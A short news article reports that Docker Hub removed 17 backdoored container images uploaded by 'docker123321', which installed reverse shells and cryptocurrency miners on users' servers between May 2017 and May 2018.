17 Backdoored Docker Images Removed From Docker Hub
The Docker team has pulled 17 Docker container images that have been backdoored and used to install reverse shells and cryptocurrency miners on users’ servers for the past year. The malicious Docker container images have been uploaded on Docker Hub, the official repository of ready-made Docker images that sysadmins can pull and use on their servers, work, or personal computers. These Docker images allow sysadmins to quickly start an application container within seconds, without having to create their own Docker app container, a complicated and painstaking process that not all users are technically capable or inclined to do.
Because new Docker images don’t go through a security audit or testing process, these images were listed on the Docker Hub portal right away, where they remained active between May 2017 and May 2018, when the Docker team finally intervened to pull them down. All 17 images were uploaded on the Docker Hub portal by the same person/group, using the pseudonym of ‘docker123321.’ Some of these packages have been installed more than one million times, while others were used hundreds of thousands of times.
Signs that something was wrong on the Docker and Kubernetes (app for managing Docker images at a large scale) scene started appearing last September and continued through the winter. Users reported that malicious activity was happening on their cloud servers running Docker and Kubernetes instances. Reports of security incidents involving Docker images were posted on GitHub and Twitter.